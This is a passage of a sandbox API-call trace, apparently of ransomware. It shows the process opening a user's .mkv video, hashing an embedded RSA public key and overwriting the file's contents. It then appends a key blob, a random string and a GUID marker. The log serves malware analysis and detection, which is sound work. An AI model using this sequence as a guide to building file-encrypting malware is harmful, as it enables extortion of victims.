ftLastAccessTime.dwHighDateTime=0x1d5bda4, ftLastWriteTime.dwLowDateTime=0xc3fece80, ftLastWriteTime.dwHighDateTime=0x1d5bda4, nFileSizeHigh=0x0, nFileSizeLow=0x9635, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xs0q0e50s.mkv", cAlternateFileName="XS0Q0E~1.MKV")) returned 1 [0096.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.883] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0096.883] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4078 | out: hHeap=0x680000) returned 1 [0096.883] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\Xs0q0e50s.mkv") returned=".mkv" [0096.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\Xs0q0e50s.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\xs0q0e50s.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.883] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=38453) returned 1 [0096.883] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.886] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x960f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.886] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.887] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.887] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.887] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x9635, lpOverlapped=0x0) returned 1 [0096.887] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.887] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.887] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.887] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.887] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.888] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.888] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.888] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.888] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.888] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.888] GetLastError () returned 0x0 [0096.888] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.888] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.888] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.889] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.889] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.889] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9640) returned 0x9a06a00 [0096.889] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.889] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02e58 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b68 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02ea0 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b80 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bb0 [0096.889] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bc8 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.890] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bb0 | out: hHeap=0x680000) returned 1 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bc8 | out: hHeap=0x680000) returned 1 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4bc8 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4bb0 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.890] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bc8 | out: hHeap=0x680000) returned 1 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bb0 | out: hHeap=0x680000) returned 1 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.890] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.891] GetCurrentThreadId () returned 0x8c4 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8a00 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.891] GetCurrentThreadId () returned 0x8c4 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.891] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.891] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bb0 [0096.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bc8 [0096.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4b98 [0096.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.892] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.892] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4be0 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bb0 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bb0 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bb0 | out: hHeap=0x680000) returned 1 [0096.893] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.893] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.894] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4be0 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bc8 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b98 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4b80 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02ea0 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.894] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.894] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x9630, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x9630, lpOverlapped=0x0) returned 1 [0096.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.895] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x9635, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.895] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.895] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.895] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.895] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.895] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.895] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.895] CloseHandle (hObject=0x6a8) returned 1 [0096.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4258 [0096.898] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0096.898] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 